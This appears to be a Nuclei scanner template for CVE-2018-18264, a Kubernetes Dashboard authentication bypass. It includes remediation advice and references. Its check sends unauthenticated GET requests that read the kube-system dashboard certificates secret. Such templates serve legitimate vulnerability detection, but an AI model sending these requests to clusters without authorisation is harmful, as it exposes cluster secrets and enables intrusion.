Description
Kubernetes Dashboard before 1.10.1 allows attackers to bypass authentication and use Dashboard's Service Account for reading secrets within the cluster.
Kubernetes Dashboard before 1.10.1 allows attackers to bypass authentication and use Dashboard's Service Account for reading secrets within the cluster.
id: CVE-2018-18264
info:
name: Kubernetes Dashboard <1.10.1 - Authentication Bypass
author: edoardottt
severity: high
description: |
Kubernetes Dashboard before 1.10.1 allows attackers to bypass authentication and use Dashboard's Service Account for reading secrets within the cluster.
impact: |
An attacker can bypass authentication and gain unauthorized access to the Kubernetes Dashboard, potentially leading to further compromise of the Kubernetes cluster.
remediation: |
Upgrade to Kubernetes Dashboard version 1.10.1 or later to mitigate the authentication bypass vulnerability.
reference:
- https://github.com/kubernetes/dashboard/pull/3289
- https://sysdig.com/blog/privilege-escalation-kubernetes-dashboard/
- https://groups.google.com/forum/#!topic/kubernetes-announce/yBrFf5nmvfI
- https://nvd.nist.gov/vuln/detail/CVE-2018-18264
- https://github.com/kubernetes/dashboard/pull/3400
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-18264
cwe-id: CWE-306
epss-score: 0.70372
epss-percentile: 0.99351
cpe: cpe:2.3:a:kubernetes:dashboard:*:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: kubernetes
product: dashboard
shodan-query:
- product:"Kubernetes"
- product:"kubernetes"
tags: cve,cve2018,kubernetes,k8s,auth-bypass,vuln
http:
- method: GET
path:
- "{{BaseURL}}/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs"
- "{{BaseURL}}/k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'contains(body, "apiVersion") && contains(body, "objectRef")'
- type: status
status:
- 200
# digest: 4a0a004730450220151f4e3e8d99b8f840833ba1608514c88a7239946eb04fe4810411984d58f68a022100fb529c4681649504078866cec43b880ed60e15a48d67637632cb3011fb2c2eb5:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.